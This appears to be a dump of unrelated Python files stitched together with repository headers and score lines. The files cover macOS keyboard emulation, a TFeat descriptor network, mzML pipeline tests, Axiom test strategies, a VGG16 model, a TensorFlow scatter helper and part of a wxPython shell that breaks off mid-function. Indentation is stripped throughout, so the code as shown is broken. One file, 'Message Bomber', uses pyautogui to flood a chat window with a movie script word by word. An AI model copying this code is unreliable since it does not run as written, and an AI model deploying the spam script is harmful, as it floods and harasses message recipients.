'8': 0x1c,
'0': 0x1d,
']': 0x1e,
'o': 0x1f,
'u': 0x20,
'[': 0x21,
'i': 0x22,
'p': 0x23,
'l': 0x25,
'j': 0x26,
'\'': 0x27,
'k': 0x28,
';': 0x29,
'\\': 0x2a,
',': 0x2b,
'/': 0x2c,
'n': 0x2d,
'm': 0x2e,
'.': 0x2f,
'`': 0x32,
' ': 0x31,
'\r': 0x24,
'\t': 0x30,
'\n': 0x24,
'return' : 0x24,
'tab' : 0x30,
'space' : 0x31,
'delete' : 0x33,
'escape' : 0x35,
'command' : 0x37,
'shift' : 0x38,
'capslock' : 0x39,
'option' : 0x3A,
'alternate' : 0x3A,
'control' : 0x3B,
'rightshift' : 0x3C,
'rightoption' : 0x3D,
'rightcontrol' : 0x3E,
'function' : 0x3F,
}
# Taken from ev_keymap.h
# http://www.opensource.apple.com/source/IOHIDFamily/IOHIDFamily-86.1/IOHIDSystem/IOKit/hidsystem/ev_keymap.h
special_key_translate_table = {
'KEYTYPE_SOUND_UP': 0,
'KEYTYPE_SOUND_DOWN': 1,
'KEYTYPE_BRIGHTNESS_UP': 2,
'KEYTYPE_BRIGHTNESS_DOWN': 3,
'KEYTYPE_CAPS_LOCK': 4,
'KEYTYPE_HELP': 5,
'POWER_KEY': 6,
'KEYTYPE_MUTE': 7,
'UP_ARROW_KEY': 8,
'DOWN_ARROW_KEY': 9,
'KEYTYPE_NUM_LOCK': 10,
'KEYTYPE_CONTRAST_UP': 11,
'KEYTYPE_CONTRAST_DOWN': 12,
'KEYTYPE_LAUNCH_PANEL': 13,
'KEYTYPE_EJECT': 14,
'KEYTYPE_VIDMIRROR': 15,
'KEYTYPE_PLAY': 16,
'KEYTYPE_NEXT': 17,
'KEYTYPE_PREVIOUS': 18,
'KEYTYPE_FAST': 19,
'KEYTYPE_REWIND': 20,
'KEYTYPE_ILLUMINATION_UP': 21,
'KEYTYPE_ILLUMINATION_DOWN': 22,
'KEYTYPE_ILLUMINATION_TOGGLE': 23
}
class PyKeyboard(PyKeyboardMeta):
def __init__(self):
self.shift_key = 'shift'
self.modifier_table = {'Shift':False,'Command':False,'Control':False,'Alternate':False}
def press_key(self, key):
if key.title() in self.modifier_table:
self.modifier_table.update({key.title():True})
if key in special_key_translate_table:
self._press_special_key(key, True)
else:
self._press_normal_key(key, True)
def release_key(self, key):
# remove the key
if key.title() in self.modifier_table: self.modifier_table.update({key.title():False})
if key in special_key_translate_table:
self._press_special_key(key, False)
else:
self._press_normal_key(key, False)
def special_key_assignment(self):
self.volume_mute_key = 'KEYTYPE_MUTE'
self.volume_down_key = 'KEYTYPE_SOUND_DOWN'
self.volume_up_key = 'KEYTYPE_SOUND_UP'
self.media_play_pause_key = 'KEYTYPE_PLAY'
# Doesn't work :(
# self.media_next_track_key = 'KEYTYPE_NEXT'
# self.media_prev_track_key = 'KEYTYPE_PREVIOUS'
def _press_normal_key(self, key, down):
try:
key_code = character_translate_table[key.lower()]
# kCGEventFlagMaskAlternate | kCGEventFlagMaskCommand | kCGEventFlagMaskControl | kCGEventFlagMaskShift
event = Quartz.CGEventCreateKeyboardEvent(None, key_code, down)
mkeyStr = ''
for mkey in self.modifier_table:
if self.modifier_table[mkey]:
if len(mkeyStr)>1: mkeyStr = mkeyStr+' ^ '
mkeyStr = mkeyStr+'Quartz.kCGEventFlagMask'+mkey
if len(mkeyStr)>1: eval('Quartz.CGEventSetFlags(event, '+mkeyStr+')')
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
if key.lower() == "shift":
time.sleep(.1)
except KeyError:
raise RuntimeError("Key {} not implemented.".format(key))
def _press_special_key(self, key, down):
""" Helper method for special keys.
Source: http://stackoverflow.com/questions/11045814/emulate-media-key-press-on-mac
"""
key_code = special_key_translate_table[key]
ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
NSSystemDefined, # type
(0,0), # location
0xa00 if down else 0xb00, # flags
0, # timestamp
0, # window
0, # ctx
8, # subtype
(key_code << 16) | ((0xa if down else 0xb) << 8), # data1
-1 # data2
)
Quartz.CGEventPost(0, ev.Quartz.CGEvent())
class PyKeyboardEvent(PyKeyboardEventMeta):
def run(self):
tap = Quartz.CGEventTapCreate(
Quartz.kCGSessionEventTap,
Quartz.kCGHeadInsertEventTap,
Quartz.kCGEventTapOptionDefault,
Quartz.CGEventMaskBit(Quartz.kCGEventKeyDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventKeyUp),
self.handler,
None)
loopsource = Quartz.CFMachPortCreateRunLoopSource(None, tap, 0)
loop = Quartz.CFRunLoopGetCurrent()
Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
Quartz.CGEventTapEnable(tap, True)
while self.state:
Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)
def handler(self, proxy, type, event, refcon):
key = Quartz.CGEventGetIntegerValueField(event, Quartz.kCGKeyboardEventKeycode)
if type == Quartz.kCGEventKeyDown:
self.key_press(key)
elif type == Quartz.kCGEventKeyUp:
self.key_release(key)
if self.capture:
Quartz.CGEventSetType(event, Quartz.kCGEventNull)
return event
| 1.65625 | 2 |
python/features/tfeat.py | albutko/vlb | 1 | 12798027 | <gh_stars>1-10
"""
TFeat Implementation
Author: <NAME>
"""
import sys
import os
import torch
from torch import nn
import torch.nn.functional as F
import numpy as np
import cv2
from features.DetectorDescriptorTemplate import DetectorAndDescriptor
import features.feature_utils as utils
dirname = os.path.dirname(__file__)
class tfeat(DetectorAndDescriptor):
def __init__(self, pretrained_model='tfeat_misc/tfeat-liberty.params'):
super(
tfeat,
self).__init__(
name='tfeat',
is_detector=False,
is_descriptor=True,
is_both=False,
patch_input=True,
can_batch=True)
self.model = TNet()
pretrained_model = os.path.join(dirname, pretrained_model)
self.model.load_state_dict(torch.load(pretrained_model, map_location='cpu'))
self.model.eval()
def extract_descriptors_from_patch_batch(self, batch):
nb_patches = batch.shape[0]
batch_resized = list()
for i, patch in enumerate(batch):
batch_resized.append(cv2.resize(batch[i], (32, 32), interpolation=cv2.INTER_AREA))
batch_resized = torch.tensor(batch_resized)
batch_resized = batch_resized.view(nb_patches,1,32,32)
desc = self.model(batch_resized.float())
return desc.detach().numpy()
def extract_descriptors_from_patch(self, patch):
patch = cv2.resize(patch, (32, 32), interpolation=cv2.INTER_AREA)
patch = torch.tensor(patch)
patch = patch.view(1,1,32,32)
desc = self.model(patch.float())
return desc.detach().numpy()
def extract_descriptor(self, image, feature):
gray_image = utils.all_to_gray(image)
patches = []
for f in feature:
patch = utils.extract_patch(gray_image, f, patch_sz=32)
patches.append(patch)
patches = np.array(patches)
desc = self.extract_descriptors_from_patch_batch(patches)
return desc
class TNet(nn.Module):
"""TFeat model definition
"""
def __init__(self, pretrained_model=None):
super(TNet, self).__init__()
self.features = nn.Sequential(
nn.InstanceNorm2d(1, affine=False),
nn.Conv2d(1, 32, kernel_size=7),
nn.Tanh(),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(32, 64, kernel_size=6),
nn.Tanh()
)
self.descr = nn.Sequential(
nn.Linear(64 * 8 * 8, 128),
nn.Tanh()
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.descr(x)
return x
| 1.921875 | 2 |
tests/integration/test_mzml_input.py | Linington-Lab/metabolate- | 1 | 12798028 | <gh_stars>1-10
import os
import tempfile
from pathlib import Path
from zipfile import ZipFile
import shutil
import pandas as pd
import numpy as np
import time
from npanalyst import configuration, cli
from pandas._testing import assert_series_equal
# # Helper functions
def dataframe_assertion(reference_path, test_path):
"""This function reads the respective dataframe and compares
the two files."""
result_table = pd.read_csv(reference_path)
# # This resorting is just a safe-guard to assure that rows are ordered properly and error messages are
# # due to wrong values, not due to interchanged rows
result_table.sort_values(
by=["UniqueFiles", "PrecMz", "RetTime"], ignore_index=True, inplace=True
)
test_table = pd.read_csv(Path(test_path))
test_table.sort_values(
by=["UniqueFiles", "PrecMz", "RetTime"], ignore_index=True, inplace=True
)
assert_series_equal(result_table["UniqueFiles"], test_table["UniqueFiles"])
assert np.sum(result_table["PrecMz"] - test_table["PrecMz"]) < 0.1
assert np.sum(result_table["RetTime"] - test_table["RetTime"]) < 0.1
# # Define relative path to input files
HERE = Path(__file__).parent
# mzML files
INPUT_MZML_FILES = HERE / "data/BioMAP_mzml_input.zip"
# Replicate compared basketed CSVs
OUTPUT_FILE_REPLICATED = HERE / "data/replicated_mzml_result.zip"
# Basketed CSV file output
OUTPUT_FILE_BASKETED = HERE / "data/basketed_mzml.csv"
# # Test config settings (ms parameter and AS and CS threshold)
def test_config_parameter():
"""This test shall guarantee that the loaded settings are identical to those, used to
obtain the reference/ground truth results."""
configd = configuration.load_config(config_path=None)
print(configd)
assert configd["ACTIVITYTHRESHOLD"] == 2
assert configd["CLUSTERTHRESHOLD"] == 0.3
assert configd["MINREPSREPLICATES"] == 2
assert configd["MINREPSBASKETS"] == 1
assert configd["ERRORINFO"]["PrecMz"] == ("ppm", 30.0)
assert configd["ERRORINFO"]["RetTime"] == ("window", 0.03)
assert configd["MININTENSITY"] == 2e3
def test_mzml_replicate_comparison():
"""Test for the replicate comparison step. The BioMAP mzML dataset is used to generate the
replicate-compared csv files. A full dataframe by dataframe comparison is performed to ensure
identical csv files."""
# # Create temporary folder for result and test files
tmpdir = tempfile.mkdtemp()
# # Open and extract zip file that contains the 2775 mzML files
with ZipFile(Path(INPUT_MZML_FILES), "r") as zip:
zip.extractall(Path(tmpdir, "mzml_files"))
# # Perform replicate comparison
cli.run_replicate(
input_path=Path(tmpdir, "mzml_files"),
output_path=Path(tmpdir),
workers=-2,
verbose=False,
config=None,
)
# # Test length of generated replicated files (=925)
length = len(os.listdir(Path(tmpdir, "replicated")))
assert length == 925
# # Get replicated zip output file with expected output files and extract them
with ZipFile(Path(OUTPUT_FILE_REPLICATED), "r") as zip:
zip.extractall(Path(tmpdir, "expected_replicated_results"))
# # Catch all csv files from the expected results
replicate_file_names = os.listdir(Path(tmpdir, "expected_replicated_results"))
# # Compare the expected replicated files with the produced files
for rep in replicate_file_names:
dataframe_assertion(
reference_path=Path(tmpdir, "expected_replicated_results", rep),
test_path=Path(tmpdir, "replicated", rep),
)
# # Remove temporary folder. Windows would not delete all files.
# # Python 3.11 seems to enable the ignore_errors function also for tempfile.TemporaryDirectory() which
# # is the nicer context manager option.
# shutil.rmtree(tmpdir, ignore_errors=True)
def test_mzml_basket_building():
"""Test for basket building step. A folder with expected replicate-compared output CSVs is used
as the input. The resulting basket.csv file is compared to an expected output file. A full dataframe by dataframe
comparison is performed to ensure identical csv files."""
# # Create temporary folder for result and test files
tmpdir = tempfile.mkdtemp()
# # Get replicated zip output file with expected output files and extract them
with ZipFile(Path(OUTPUT_FILE_REPLICATED), "r") as zip:
zip.extractall(Path(tmpdir))
cli.run_basketing(
input_path=Path(tmpdir), output_path=Path(tmpdir), verbose=False, config=None
)
# # Compare the expected basketed file with the produced file
dataframe_assertion(
reference_path=Path(OUTPUT_FILE_BASKETED),
test_path=Path(tmpdir, "basketed.csv"),
)
# # Remove the temp folder
shutil.rmtree(tmpdir, ignore_errors=True)
# if __name__ == "__main__":
#
# start = time.time()
#
# test_mzml_basket_building()
#
# test_mzml_replicate_comparison()
#
# test_mzml_basket_building()
#
# print(f"This testing took: {(time.time() - start) / 60:.2f} minutes.")
| 2.296875 | 2 |
axiom/test/strategies.py | opacam/axiom | 23 | 12798029 | """
Hypothesis strategies for generating Axiom-related data.
"""
from epsilon.extime import Time
from hypothesis import strategies as st
from hypothesis.extra.datetime import datetimes
from axiom.attributes import LARGEST_NEGATIVE, LARGEST_POSITIVE
def axiomText(*a, **kw):
"""
Strategy for generating Axiom-compatible text values.
"""
return st.text(
alphabet=st.characters(
blacklist_categories={'Cs'},
blacklist_characters={u'\x00'}),
*a, **kw)
def textlists():
"""
Strategy for generating lists storable with L{axiom.attributes.textlist}.
"""
return st.lists(st.text(
alphabet=st.characters(
blacklist_categories={'Cs'},
blacklist_characters={u'\x00', u'\x02', u'\x1f'})))
def axiomIntegers(minValue=LARGEST_NEGATIVE, maxValue=LARGEST_POSITIVE):
"""
Strategy for generating Axiom-compatible integers.
@type minValue: L{int}
@param minValue: Minimum value to generate; default is the least value
that can be stored in an L{axiom.attributes.integer} attribute.
@type manValue: L{int}
@param manValue: Maximum value to generate; default is the greatest value
that can be stored in an L{axiom.attributes.integer} attribute.
"""
return st.integers(min_value=minValue, max_value=maxValue)
def timestamps(*a, **kw):
"""
Strategy for generating L{epsilon.extime.Time} objects.
"""
return st.builds(Time.fromDatetime, datetimes(timezones=[], *a, **kw))
def fixedDecimals(precision, minValue=None, maxValue=None):
"""
Strategy for generating L{decimal.Decimal} values of a fixed precision.
@type precision: L{decimal.Decimal}
@param precision: The precision to use; for example, C{Decimal('0.01')} for
a L{axiom.attributes.point2decimal} attribute.
@type minValue: L{decimal.Decimal}
@param minValue: The minimum value to generate, or C{None} for the least
possible.
@type minValue: L{decimal.Decimal}
@param minValue: The maximum value to generate, or C{None} for the greatest
possible.
"""
if minValue is None:
minValue = LARGEST_NEGATIVE
else:
minValue = int(minValue / precision)
if maxValue is None:
maxValue = LARGEST_POSITIVE
else:
maxValue = int(maxValue / precision)
return st.integers(min_value=minValue, max_value=maxValue).map(
lambda v: v * precision)
__all__ = [
'axiomText', 'axiomIntegers', 'fixedDecimals', 'timestamps', 'textlists']
| 2.84375 | 3 |
nets/VGG16.py | SekiroRong/YOLOP | 1 | 12798030 | <reponame>SekiroRong/YOLOP<gh_stars>1-10
# -*- coding = utf-8 -*-
# @Time : 2022/1/8 15:41
# @Author : 戎昱
# @File : VGG16.py
# @Software : PyCharm
# @Contact : <EMAIL>
# @github : https://github.com/SekiroRong
import math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
#-------------------------------------------------#
# MISH激活函数
#-------------------------------------------------#
class Mish(nn.Module):
def __init__(self):
super(Mish, self).__init__()
def forward(self, x):
return x * torch.tanh(F.softplus(x))
#---------------------------------------------------#
# 卷积块 -> 卷积 + 标准化 + 激活函数
# Conv2d + BatchNormalization + Mish
#---------------------------------------------------#
class BasicConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1):
super(BasicConv, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, kernel_size//2, bias=False)
self.bn = nn.BatchNorm2d(out_channels)
self.activation = Mish()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.activation(x)
return x
class VGG16(nn.Module):
def __init__(self):
super(VGG16, self).__init__()
self.layer1 = BasicConv(3, 32, 3)
self.layer2 = BasicConv(32, 64, 3)
self.layer3 = BasicConv(64, 128, 3)
self.layer4 = BasicConv(128, 256, 3)
self.maxpool = nn.MaxPool2d(2)
def forward(self,x):
x = self.maxpool(self.layer1(x))
x = self.maxpool(self.layer2(x))
x = self.maxpool(self.layer3(x))
x = self.layer4(x)
return x
# import torch
# from torchsummary import summary
#
# if __name__ == "__main__":
# # 需要使用device来指定网络在GPU还是CPU运行
# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# m = VGG16().to(device)
# summary(m, input_size=(1, 640, 480)) | 2.3125 | 2 |
Message Bomber/Message Bomber using File.py | SaiAshish-Konchada/Python-Projects-for-Beginners | 5 | 12798031 | # importing the required libraries
import pyautogui, time
# delay to switch windows
time.sleep(10)
# content you want to spam with
f = open("idoc.pub_green-lantern-movie-script.txt", 'r')
# loop to spam
for word in f:
# fetch and type each word from the file
pyautogui.write(word)
# press enter to send the message
pyautogui.press('enter')
| 3.09375 | 3 |
kgcnn/ops/scatter.py | thegodone/gcnn_keras | 47 | 12798032 | import tensorflow as tf
@tf.function
def tensor_scatter_nd_ops_by_name(segment_name, tensor, indices, updates, name=None):
"""Scatter operation chosen by name that pick tensor_scatter_nd functions.
Args:
segment_name (str): Operation to update scattered updates. Either 'sum' or 'min' etc.
tensor (tf.Tensor): Tensor to scatter updates into.
indices (tf.Tensor): Indices to for updates.
updates (tf.Tensor): Updates of new entries for tensor.
name (str): Name of the tensor.
Returns:
tf.Tensor: Updates scattered into tensor with different update rules.
"""
if segment_name in ["segment_sum", "sum", "reduce_sum", "add"]:
pool = tf.tensor_scatter_nd_add(tensor, indices, updates, name=name)
elif segment_name in ["segment_max", "max", "reduce_max"]:
pool = tf.tensor_scatter_nd_max(tensor, indices, updates, name=name)
elif segment_name in ["segment_min", "min", "reduce_min"]:
pool = tf.tensor_scatter_nd_min(tensor, indices, updates, name=name)
else:
raise TypeError("Unknown pooling, choose: 'mean', 'sum', ...")
return pool
| 3.015625 | 3 |
Latest/venv/Lib/site-packages/pyface/wx/shell.py | adamcvj/SatelliteTracker | 1 | 12798033 | <reponame>adamcvj/SatelliteTracker<filename>Latest/venv/Lib/site-packages/pyface/wx/shell.py
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought util package component>
#------------------------------------------------------------------------------
"""The PyCrust Shell is an interactive text control in which a user types in
commands to be sent to the interpreter. This particular shell is based on
wxPython's wxStyledTextCtrl. The latest files are always available at the
SourceForge project page at http://sourceforge.net/projects/pycrust/.
Sponsored by Orbtech - Your source for Python programming expertise."""
from __future__ import print_function
__author__ = "<NAME> <<EMAIL>>"
__cvsid__ = "$Id: shell.py,v 1.2 2003/06/13 17:59:34 dmorrill Exp $"
__revision__ = "$Revision: 1.2 $"[11:-2]
from wx.wx import *
from wx.stc import *
import keyword
import os
import sys
from wx.py.pseudo import PseudoFileIn, PseudoFileOut, PseudoFileErr
from wx.py.version import VERSION
# local imports
from .drag_and_drop import PythonObject
from .drag_and_drop import clipboard as enClipboard
sys.ps3 = '<-- ' # Input prompt.
NAVKEYS = (WXK_END, WXK_LEFT, WXK_RIGHT, WXK_UP, WXK_DOWN, WXK_PRIOR, WXK_NEXT)
if wxPlatform == '__WXMSW__':
faces = { 'times' : 'Times New Roman',
'mono' : 'Courier New',
'helv' : 'Lucida Console',
'lucida' : 'Lucida Console',
'other' : 'Comic Sans MS',
'size' : 10,
'lnsize' : 9,
'backcol': '#FFFFFF',
}
# Versions of wxPython prior to 2.3.2 had a sizing bug on Win platform.
# The font was 2 points too large. So we need to reduce the font size.
if (wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER) < (2, 3, 2):
faces['size'] -= 2
faces['lnsize'] -= 2
else: # GTK
faces = { 'times' : 'Times',
'mono' : 'Courier',
'helv' : 'Helvetica',
'other' : 'new century schoolbook',
'size' : 12,
'lnsize' : 10,
'backcol': '#FFFFFF',
}
class ShellFacade:
"""Simplified interface to all shell-related functionality.
This is a semi-transparent facade, in that all attributes of other are
still accessible, even though only some are visible to the user."""
name = 'PyCrust Shell Interface'
revision = __revision__
def __init__(self, other):
"""Create a ShellFacade instance."""
methods = ['ask',
'clear',
'pause',
'prompt',
'quit',
'redirectStderr',
'redirectStdin',
'redirectStdout',
'run',
'runfile',
'wrap',
'zoom',
]
for method in methods:
self.__dict__[method] = getattr(other, method)
d = self.__dict__
d['other'] = other
d['helpText'] = \
"""
* Key bindings:
Home Go to the beginning of the command or line.
Shift+Home Select to the beginning of the command or line.
Shift+End Select to the end of the line.
End Go to the end of the line.
Ctrl+C Copy selected text, removing prompts.
Ctrl+Shift+C Copy selected text, retaining prompts.
Ctrl+X Cut selected text.
Ctrl+V Paste from clipboard.
Ctrl+Shift+V Paste and run multiple commands from clipboard.
Ctrl+Up Arrow Retrieve Previous History item.
Alt+P Retrieve Previous History item.
Ctrl+Down Arrow Retrieve Next History item.
Alt+N Retrieve Next History item.
Shift+Up Arrow Insert Previous History item.
Shift+Down Arrow Insert Next History item.
F8 Command-completion of History item.
(Type a few characters of a previous command and then press F8.)
F9 Pop-up window of matching History items.
(Type a few characters of a previous command and then press F9.)
"""
def help(self):
"""Display some useful information about how to use the shell."""
self.write(self.helpText)
def __getattr__(self, name):
if hasattr(self.other, name):
return getattr(self.other, name)
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name in self.__dict__:
self.__dict__[name] = value
elif hasattr(self.other, name):
return setattr(self.other, name, value)
else:
raise AttributeError(name)
def _getAttributeNames(self):
"""Return list of magic attributes to extend introspection."""
list = ['autoCallTip',
'autoComplete',
'autoCompleteCaseInsensitive',
'autoCompleteIncludeDouble',
'autoCompleteIncludeMagic',
'autoCompleteIncludeSingle',
]
list.sort()
return list
class Shell(wxStyledTextCtrl):
"""PyCrust Shell based on wxStyledTextCtrl."""
name = 'PyCrust Shell'
revision = __revision__
def __init__(self, parent, id=-1, pos=wxDefaultPosition, \
size=wxDefaultSize, style=wxCLIP_CHILDREN, introText='', \
locals=None, InterpClass=None, *args, **kwds):
"""Create a PyCrust Shell instance."""
wxStyledTextCtrl.__init__(self, parent, id, pos, size, style)
# Grab these so they can be restored by self.redirect* methods.
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.handlers = []
self.python_obj_paste_handler = None
# Add the current working directory "." to the search path.
sys.path.insert(0, os.curdir)
# Import a default interpreter class if one isn't provided.
if InterpClass == None:
from PyCrust.interpreter import Interpreter
else:
Interpreter = InterpClass
# Create default locals so we have something interesting.
shellLocals = {'__name__': 'PyCrust-Shell',
'__doc__': 'PyCrust-Shell, The PyCrust Python Shell.',
'__version__': VERSION,
}
# Add the dictionary that was passed in.
if locals:
shellLocals.update(locals)
# Create a replacement for stdin.
self.reader = PseudoFileIn(self.readline)
self.reader.input = ''
self.reader.isreading = 0
# Set up the interpreter.
self.interp = Interpreter(locals=shellLocals, \
rawin=self.raw_input, \
stdin=self.reader, \
stdout=PseudoFileOut(self.writeOut), \
stderr=PseudoFileErr(self.writeErr), \
*args, **kwds)
# Find out for which keycodes the interpreter will autocomplete.
self.autoCompleteKeys = self.interp.getAutoCompleteKeys()
# Keep track of the last non-continuation prompt positions.
self.promptPosStart = 0
self.promptPosEnd = 0
# Keep track of multi-line commands.
self.more = 0
# Create the command history. Commands are added into the front of
# the list (ie. at index 0) as they are entered. self.historyIndex
# is the current position in the history; it gets incremented as you
# retrieve the previous command, decremented as you retrieve the
# next, and reset when you hit Enter. self.historyIndex == -1 means
# you're on the current command, not in the history.
self.history = []
self.historyIndex = -1
self.historyPrefix = 0
# Assign handlers for keyboard events.
EVT_KEY_DOWN(self, self.OnKeyDown)
EVT_CHAR(self, self.OnChar)
# Assign handlers for wxSTC events.
EVT_STC_UPDATEUI(self, id, self.OnUpdateUI)
EVT_STC_USERLISTSELECTION(self, id, self.OnHistorySelected)
# Configure various defaults and user preferences.
self.config()
# Display the introductory banner information.
try: self.showIntro(introText)
except: pass
# Assign some pseudo keywords to the interpreter's namespace.
try: self.setBuiltinKeywords()
except: pass
# Add 'shell' to the interpreter's local namespace.
try: self.setLocalShell()
except: pass
# Do this last so the user has complete control over their
# environment. They can override anything they want.
try: self.execStartupScript(self.interp.startupScript)
except: pass
def destroy(self):
# del self.interp
pass
def config(self):
"""Configure shell based on user preferences."""
self.SetMarginType(1, wxSTC_MARGIN_NUMBER)
self.SetMarginWidth(1, 40)
self.SetLexer(wxSTC_LEX_PYTHON)
self.SetKeyWords(0, ' '.join(keyword.kwlist))
self.setStyles(faces)
self.SetViewWhiteSpace(0)
self.SetTabWidth(4)
self.SetUseTabs(0)
# Do we want to automatically pop up command completion options?
self.autoComplete = 1
self.autoCompleteIncludeMagic = 1
self.autoCompleteIncludeSingle = 1
self.autoCompleteIncludeDouble = 1
self.autoCompleteCaseInsensitive = 1
self.AutoCompSetIgnoreCase(self.autoCompleteCaseInsensitive)
self.AutoCompSetSeparator(ord('\n'))
# Do we want to automatically pop up command argument help?
self.autoCallTip = 1
self.CallTipSetBackground(wxColour(255, 255, 232))
self.wrap()
try:
self.SetEndAtLastLine(false)
except AttributeError:
pass
def showIntro(self, text=''):
"""Display introductory text in the shell."""
if text:
if not text.endswith(os.linesep): text += os.linesep
self.write(text)
try:
self.write(self.interp.introText)
except AttributeError:
pass
wxCallAfter(self.ScrollToLine, 0)
def setBuiltinKeywords(self):
"""Create pseudo keywords as part of builtins.
This simply sets "close", "exit" and "quit" to a helpful string.
"""
import six.moves.builtins
six.moves.builtins.close = six.moves.builtins.exit = six.moves.builtins.quit = \
'Click on the close button to leave the application.'
def quit(self):
"""Quit the application."""
# XXX Good enough for now but later we want to send a close event.
# In the close event handler we can make sure they want to quit.
# Other applications, like PythonCard, may choose to hide rather than
# quit so we should just post the event and let the surrounding app
# decide what it wants to do.
self.write('Click on the close button to leave the application.')
def setLocalShell(self):
"""Add 'shell' to locals as reference to ShellFacade instance."""
self.interp.locals['shell'] = ShellFacade(other=self)
def execStartupScript(self, startupScript):
"""Execute the user's PYTHONSTARTUP script if they have one."""
if startupScript and os.path.isfile(startupScript):
startupText = 'Startup script executed: ' + startupScript
self.push('print %s;execfile(%s)' % \
('startupText', 'startupScript'))
else:
self.push('')
def setStyles(self, faces):
"""Configure font size, typeface and color for lexer."""
# Default style
self.StyleSetSpec(wxSTC_STYLE_DEFAULT, "face:%(mono)s,size:%(size)d,back:%(backcol)s" % faces)
self.StyleClearAll()
# Built in styles
self.StyleSetSpec(wxSTC_STYLE_LINENUMBER, "back:#C0C0C0,face:%(mono)s,size:%(lnsize)d" % faces)
self.StyleSetSpec(wxSTC_STYLE_CONTROLCHAR, "face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_STYLE_BRACELIGHT, "fore:#0000FF,back:#FFFF88")
self.StyleSetSpec(wxSTC_STYLE_BRACEBAD, "fore:#FF0000,back:#FFFF88")
# Python styles
self.StyleSetSpec(wxSTC_P_DEFAULT, "face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_COMMENTLINE, "fore:#007F00,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_NUMBER, "")
self.StyleSetSpec(wxSTC_P_STRING, "fore:#7F007F,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_CHARACTER, "fore:#7F007F,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_WORD, "fore:#00007F,bold")
self.StyleSetSpec(wxSTC_P_TRIPLE, "fore:#7F0000")
self.StyleSetSpec(wxSTC_P_TRIPLEDOUBLE, "fore:#000033,back:#FFFFE8")
self.StyleSetSpec(wxSTC_P_CLASSNAME, "fore:#0000FF,bold")
self.StyleSetSpec(wxSTC_P_DEFNAME, "fore:#007F7F,bold")
self.StyleSetSpec(wxSTC_P_OPERATOR, "")
self.StyleSetSpec(wxSTC_P_IDENTIFIER, "")
self.StyleSetSpec(wxSTC_P_COMMENTBLOCK, "fore:#7F7F7F")
self.StyleSetSpec(wxSTC_P_STRINGEOL, "fore:#000000,face:%(mono)s,back:#E0C0E0,eolfilled" % faces)
def OnUpdateUI(self, evt):
"""Check for matching braces."""
braceAtCaret = -1
braceOpposite = -1
charBefore = None
caretPos = self.GetCurrentPos()
if caretPos > 0:
charBefore = self.GetCharAt(caretPos - 1)
#*** Patch to fix bug in wxSTC for wxPython < 2.3.3.
if charBefore < 0:
charBefore = 32 # Mimic a space.
#***
styleBefore = self.GetStyleAt(caretPos - 1)
# Check before.
if charBefore and chr(charBefore) in '[]{}()' \
and styleBefore == wxSTC_P_OPERATOR:
braceAtCaret = caretPos - 1
# Check after.
if braceAtCaret < 0:
charAfter = self.GetCharAt(caretPos)
#*** Patch to fix bug in wxSTC for wxPython < 2.3.3.
if charAfter < 0:
charAfter = 32 # Mimic a space.
#***
styleAfter = self.GetStyleAt(caretPos)
if charAfter and chr(charAfter) in '[]{}()' \
and styleAfter == wxSTC_P_OPERATOR:
braceAtCaret = caretPos
if braceAtCaret >= 0:
braceOpposite = self.BraceMatch(braceAtCaret)
if braceAtCaret != -1 and braceOpposite == -1:
self.BraceBadLight(braceAtCaret)
else:
self.BraceHighlight(braceAtCaret, braceOpposite)
def OnChar(self, event):
"""Keypress event handler.
Only receives an event if OnKeyDown calls event.Skip() for
the corresponding event."""
# Prevent modification of previously submitted commands/responses.
if not self.CanEdit():
return
key = event.KeyCode()
currpos = self.GetCurrentPos()
stoppos = self.promptPosEnd
# Return (Enter) needs to be ignored in this handler.
if key == WXK_RETURN:
pass
elif key in self.autoCompleteKeys:
# Usually the dot (period) key activates auto completion.
# Get the command between the prompt and the cursor.
# Add the autocomplete character to the end of the command.
command = self.GetTextRange(stoppos, currpos)
if command == '':
self.historyShow()
else:
command += chr(key)
self.write(chr(key))
if self.autoComplete: self.autoCompleteShow(command)
elif key == ord('('):
# The left paren activates a call tip and cancels
# an active auto completion.
if self.AutoCompActive(): self.AutoCompCancel()
# Get the command between the prompt and the cursor.
# Add the '(' to the end of the command.
self.ReplaceSelection('')
command = self.GetTextRange(stoppos, currpos) + '('
self.write('(')
if self.autoCallTip: self.autoCallTipShow(command)
else:
# Allow the normal event handling to take place.
event.Skip()
def OnKeyDown(self, event):
"""Key down event handler."""
# Prevent modification of previously submitted commands/responses.
key = event.KeyCode()
controlDown = event.ControlDown()
altDown = event.AltDown()
shiftDown = event.ShiftDown()
currpos = self.GetCurrentPos()
endpos = self.GetTextLength()
selecting = self.GetSelectionStart() != self.GetSelectionEnd()
# Return (Enter) is used to submit a command to the interpreter.
if not controlDown and key == WXK_RETURN:
if self.AutoCompActive():
event.Skip()
return
if self.CallTipActive(): self.CallTipCancel()
self.processLine()
# Ctrl+Return (Cntrl+Enter) is used to insert a line break.
elif controlDown and key == WXK_RETURN:
